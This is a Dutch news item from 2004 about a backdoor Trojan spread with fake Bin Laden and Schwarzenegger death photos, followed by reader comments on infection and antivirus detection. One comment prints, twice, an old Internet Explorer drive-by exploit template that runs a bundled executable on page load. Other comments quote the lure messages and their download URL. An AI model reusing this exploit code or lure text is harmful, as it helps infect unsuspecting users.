In een aantal nieuwsgroepen en ook via e-mail is een backdoor opgedoken dat de nietsvermoedende pc-gebruiker op een opvallende manier wil lokken: het bericht claimt te linken naar een website met foto's van een zichzelf dodende Osama Bin Laden, gemaakt door CNN-journalisten. Er is ook een variant opgedoken: een soortgelijk bericht, met de melding dat er een foto is bijgevoegd van Carliforniës gouverneur Arnold Schwarzenegger, hangend aan een strop aan een boom. Uiteraard zijn er in beide gevallen geen foto's terug te vinden onder de gegeven link. De goedgelovige lezer die erop klikt, haalt de backdoor in kwestie binnen, een Trojaans paard. Het is opvallend hoe malware-makers steeds creatiever worden om hun programma's aan de man te brengen'. Waar men eerder met vermeende naaktfoto's van Anna Kournikova en een liefdesbrief (het I Love You-virus) werd gelokt, wordt er nu blijkbaar ingespeeld op een vrij morbide sensatiegevoel.
Backdoor lokt computeraar met foto's 'zelfmoord Bin Laden'
Lees meer
:strip_exif()/i/1297349685.gif?f=fpa)
Anna Kournikova-virus wordt tien
Nieuws van 11 februari 2011
Malwareschrijvers gebruiken open-sourcetactieken
Nieuws van 10 september 2004
Virusbescherming prioriteit op netwerk Olympische Spelen
Nieuws van 23 juli 2004
Na Bagle.AF richt ook Bagle.AI schade aan
Nieuws van 20 juli 2004
Antivirusbedrijven waarschuwen voor opkomst Bagle.AF
Nieuws van 17 juli 2004
Bagle is back in business
Nieuws van 7 juli 2004
Virusaanval op creditcardnummers
Nieuws van 26 juni 2004
Reacties (43)
:strip_icc():strip_exif()/u/84176/crop577a4401d15ce_cropped.jpeg?f=community){kind=small}
Dan vraag ik me wel af hoe dat Trojaans paard binnengehaald wordt. Is het een soort van zelfmoordbinladen.jpg.exe ofzoiets? Of wordt gebruik gemaakt van een exploit/bug in een browser?
In dit geval zit er een link in naar een zip bestand genaam OsamaFoundDead.zip. Voor de lol heb ik die gedownload en er zit een .exe bestand in. Niet eens gecamoulfeerd als een jpg of zoiets. Die heb ik maar meteen weggetiefd want dat leek me geen zuivere koffie.
Dus als je dit virus binnenhaalt heb je heel lang onder een steen gelegen.
Dus als je dit virus binnenhaalt heb je heel lang onder een steen gelegen.
Ik zal niet zeggen dat het *slim* is om een virus binnen te halen ofzo, maar om mijn arme oude moeder ervan te beschuldigen dat ze te lang onder een steen heeft gelegen is ook nogal dom. Als jij als slimme IT-er vergeten bent om een virusscanner bij haar te installeren, dan ben jij degene die al te lang onder een steen ligt.Dus als je dit virus binnenhaalt heb je heel lang onder een steen gelegen.
en die handige virus scanner die jij als slimme it'er bij je moeder installeert houd alle virussen tegen.
of ze nou al in de definities staan of niet..
of ze nou al in de definities staan of niet..
Tja.. anno 2004 denk ik toch wel dat je mag verwachten dat mensen twee keer nadenken voordat ze in dergelijke truukjes trappen.. Je weet toch ook hoe laat het is als er twee personen voor de deur staan die beginnen met 'Ik kom u een blijde boodschap brengen'
"ben ik... ben ik ZWANGER???"
* 786562 CamelKnight
* 786562 CamelKnight
Cool, hoe doe je dat????CamelKnight's profiel werd toegevoegd op vrijdag 30 mei 2003 en voor het laatst gewijzigd op vrijdag 30 mei 2003.
Naam
Geslacht Man
:strip_icc():strip_exif()/u/35487/avant.jpg?f=community){kind=small}
ik heb een keertje een avi/divx bestandje gehad en die opende zelf een webpagina, dit gebeurde ook op andere pc's
vraag me niet hoe het werkt, maar het is goed mogelijk dat dit op de zelfde manier werkt
vraag me niet hoe het werkt, maar het is goed mogelijk dat dit op de zelfde manier werkt
:strip_icc():strip_exif()/u/4167/bacall8.jpg?f=community){kind=small}
Je kan in een .avi / .wmv scripting verwerke, bijvoorbeeld voor sponsoring links / reclame / DRM activeringslinks / noem maar op.
WMP 8/9 hebben dan ook niet voor niks de optie om dat uit te zetten.
WMP 8/9 hebben dan ook niet voor niks de optie om dat uit te zetten.
Je bedoelt dat Microsoft niet voor niets de enige is die dat scripting in zijn software heeft?
Waar is dat in te stellen? Ik kon geen checkbox vinden in het Opties menu van WMP 8 om deze "feature" uit te schakelen.
/u/26561/mahi001.png?f=community){kind=small}
Het gaat om een doodeenvoudige executable in een zip-archief. Het downloaden en uitpakken van het zip-archief is natuurlijk ongevaarlijk. Het uitvoeren van de exe is natuurlijk een andere zaak.Dan vraag ik me wel af hoe dat Trojaans paard binnengehaald wordt. Is het een soort van zelfmoordbinladen.jpg.exe ofzoiets?
Onbegrijpelijk overigens dat er nog mensen zijn die hierdoor geïnfecteerd worden. Hoe dom ben je dan eigenlijk wel niet? Leren ze dan echt niets na elke virusgolf? Je hebt niet eens een scanner nodig om vanop enkele kilometers afstand te kunnen zien dat het hier om een virus gaat.
Ik heb dat zip bestand ook al binnengehaald. De zip geopend, maar toen ik een exe file zag van 10,6 kb dacht ik hmm, toch maar niet.
Dacht dat Bush een verkiezingsstunt had geforceerd
Dacht dat Bush een verkiezingsstunt had geforceerd
Die mensen zijn helemaal niet dom, maar geen IT experts zoals jij. Nieuws over "virus-golven" gaat aan die mensen compleet voorbij en begrijpen ze niet. Als er al iets in het ALGEMENE nieuws komt is het advies altijd "zorg dat je up-to-date bent, qua virus scan en OS". Waarbij de consument dan dus denkt veilig te zijn.
Maar misschien vind jij dat jouw moeder ook tweakers hoort te lezen en te weten wat exe, pif etc zijn, ook al worden ze door schijnbare bekende afzenders verstuurd.
Maar misschien vind jij dat jouw moeder ook tweakers hoort te lezen en te weten wat exe, pif etc zijn, ook al worden ze door schijnbare bekende afzenders verstuurd.
/u/59804/GoTlogo.JPG?f=community){kind=small}
Een malware is een executable die geactiveerd wordt door bijvoorbeeld een exploit in the (internet explorer) browser
Als je dus op de webpage komt dan wordt automatisch de exe gedownload en geactiveerd
Dit is een voorbeeld van een oude exploit, de meeste machienes zijn hier wel tegen gepatched.
<html>
MIME-Version: 1.0
Content-Location:malware.exe
Content-Transfer-Encoding: base64
[troyan hier, exe geconverteerd met bin2hex]
<title>malware.com</title>
<body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left :90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid :77777777-7777-7777-7777" codebase="mhtml:'+path+'\\troyan!malware.exe"></object>')
}
setTimeout("malware()",150)
</script>
</html>
edit: bin2hex / hex2bin?
Als je dus op de webpage komt dan wordt automatisch de exe gedownload en geactiveerd
Dit is een voorbeeld van een oude exploit, de meeste machienes zijn hier wel tegen gepatched.
<html>
MIME-Version: 1.0
Content-Location:malware.exe
Content-Transfer-Encoding: base64
[troyan hier, exe geconverteerd met bin2hex]
<title>malware.com</title>
<body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left :90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid :77777777-7777-7777-7777" codebase="mhtml:'+path+'\\troyan!malware.exe"></object>')
}
setTimeout("malware()",150)
</script>
</html>
edit: bin2hex / hex2bin?
:strip_exif()/u/12147/DJ-Eraserhead.gif?f=community){kind=small}
het zijn meestal xxx.jpg.scrzelfmoordbinladen.jpg.exe ofzoiets
:strip_icc():strip_exif()/u/1522/crop5f4a0291a77ba_cropped.jpeg?f=community){kind=small}
Ik heb dat osama ding 3 dagen geleden mogen ontvangen op mijn homepage. Zip file met UPX gepackte executable erin.
Op dit moment hebben iig Antivir, Bitdefender, ClamAV, F-Prot, F-Secure, Kaspersky en Mcafee detectie. Norman herkent het met sandbox als een backdoor, DrWeb herkent nog altijd niks.
Het ding is wel "populair". In 3 dagen tijd 11 keer ontvangen. Maar je moet wel heel stom zijn om hier in te trappen (maar ja, gebruikers......)
Op dit moment hebben iig Antivir, Bitdefender, ClamAV, F-Prot, F-Secure, Kaspersky en Mcafee detectie. Norman herkent het met sandbox als een backdoor, DrWeb herkent nog altijd niks.
Het ding is wel "populair". In 3 dagen tijd 11 keer ontvangen. Maar je moet wel heel stom zijn om hier in te trappen (maar ja, gebruikers......)
Symantec's Norton AV herkent 'm ook nog niet. Ik heb de Arnold Schwarzenegger variant gedownload, maar norton grijpt niet in (definities (21-07)
18:43 edit: Nu de definities gedownload van 24-07 (vanaf website) en Norton herkent 'm nu wel Backdoor.Hacarmy.D, zal wel niet lang meer duren voordat deze defs nu ook in de liveupdate zitten.
18:43 edit: Nu de definities gedownload van 24-07 (vanaf website) en Norton herkent 'm nu wel Backdoor.Hacarmy.D, zal wel niet lang meer duren voordat deze defs nu ook in de liveupdate zitten.
Trend Micro Internet security kent de Arnold Schwarzenegger variant ook nog niet niet. Hierin gaat het om een afscheidsbrief en niet om een foto.
Early this morning Arnold Schwarzenegger was found hanging by his neck from the large oak tree in his Californian garden. In a suicide note found at the scene he tells of his sordid sex life and lack of will to live. A copy of the suicide note which was found by journalists has been included here http://www.theparadise.x-y.net/scrambledbyjeromeo.zip"
Dit is een zipfile met daarin een .scr bestand dat in werkelijkheid een "gewone".exe is.
Early this morning Arnold Schwarzenegger was found hanging by his neck from the large oak tree in his Californian garden. In a suicide note found at the scene he tells of his sordid sex life and lack of will to live. A copy of the suicide note which was found by journalists has been included here http://www.theparadise.x-y.net/scrambledbyjeromeo.zip"
Dit is een zipfile met daarin een .scr bestand dat in werkelijkheid een "gewone".exe is.
Een .scr bestand is per definitie al een .exe(cutable)! Kijk maar eens naar een screensaver die je op je bak hebt staan...
/u/30402/icon2.png?f=community){kind=small}
AVG herkent 'm ook niet als virus (definities 22/7). Er zijn momenteel (7:58 26/7) geen updates.
(AVG is inderdaad - zoals eerder al bekend werd - niet sterk in Trojans...)
(AVG is inderdaad - zoals eerder al bekend werd - niet sterk in Trojans...)
"Ezels, kuddedieren". Niet zo denigrerend over 95% van de computergebruikers. Waarom leren die niets? Omdat ze een "neefje" hebben die de zaak wel weer in orde brengt als er iets niet meer werkt. Makkelijker dan zelf leren.
Ezels en kuddedieren dus (hoe wil je de onwil om zelf iets te leren anders noemen?) Dit is inderdaad een vrij makkelijk voor de leek aan de hand van wat vuistregels te herkennen virus.
het viel me inderdaad op, in de verscheidene nieuwsgroepen. alleen is de titel wat tegenstrijdig: het zou gaan over een virus, maar is een trojan. het is dus waarschijnlijk zo dat de auteurs zelf op usenet die berichten gepost hebben om mensen het te laten openen, in plaats van dat de trojan zèlf de berichten op usenet gezet heeft. verder is het niet echt een slimme strategie, alle posts verwijzen naar 1 of 2 verschillende servers, die natuurlijk zo down (gehaald) zijn. er circuleert overigens ook een dergelijke post over Schwarzenegger.
Ik zie hetzelfde virus ondertussen in meerdere nieuwsgroepen onder andere "click me" berichten opduiken. Bijvoorbeeld:
Are you 18-35? Have a good look? Keep in shape? Want to make some extra cash?
Download our application form here and we will send you more details on how your face can make you up to $4,000 a week.
http://theparadise.x-y.net/namechangedbyjeromeo.zip
Het gaat steeds om hetzelfde scr bestand met telkens een andere naam. Het bestand staat wel op dezelfde server. Zo te zien in Seoul. Een whois levert mij geen contactadressen op.
Are you 18-35? Have a good look? Keep in shape? Want to make some extra cash?
Download our application form here and we will send you more details on how your face can make you up to $4,000 a week.
http://theparadise.x-y.net/namechangedbyjeromeo.zip
Het gaat steeds om hetzelfde scr bestand met telkens een andere naam. Het bestand staat wel op dezelfde server. Zo te zien in Seoul. Een whois levert mij geen contactadressen op.
Mensen moeten gewoon niet zo goed gelovig zijn. En jouw 'arme oude moeder' begrijpt ook wel dat er geen foto's zijn van een Osama die zelfmoord pleegt....Ik zal niet zeggen dat het *slim* is om een virus binnen te halen ofzo, maar om mijn arme oude moeder ervan te beschuldigen dat ze te lang onder een steen heeft gelegen is ook nogal dom. Als jij als slimme IT-er vergeten bent om een virusscanner bij haar te installeren, dan ben jij degene die al te lang onder een steen ligt.
Het is een ultieme verleiding. Iets wat je zo graag zou zien. Denk maar aan die schattige beentjes van die tenisster, die ook zo lekker tennist met haar beentje wijd 
"met haar beentje wijd"... ze doet mee aan de paralympics?
/u/66863/1117631389.png?f=community){kind=small}
Vrij logisch is mijn ogen, zeker als het plaatje maar +/- 5 - 10 kb is.
Hoe kleiner het virus hoe effectiever met de verspreiding. 
Gisteren werd ik gelukkig al snel op de radio geattendeerd met het radiojournaal. Als de foto's echt bestonden zou het natuurlijk zo interessant zijn om te zien, dat veel mensen geloven in het ongelooflijke, en toch op het linkje drukken.
Gisteren werd ik gelukkig al snel op de radio geattendeerd met het radiojournaal. Als de foto's echt bestonden zou het natuurlijk zo interessant zijn om te zien, dat veel mensen geloven in het ongelooflijke, en toch op het linkje drukken.
"Als professioneel virus-maker moet je natuurlijk met de trend mee gaan." "Huh? Wat heb jij nou gefabriceerd? Ik dacht dat je koffie zou halen?"
/u/24798/60x60.png?f=community){kind=small}
Ergste is nog wel dat nav er zoiezo eentje niet heeft geblacklist. Heb hier een sample die wel door kaspersky wordt geflagged maar niet door norton antivirus 
Tsk tsk... niet eens gegimpte fotos, dat is wel heel karig.
Op dit item kan niet meer gereageerd worden.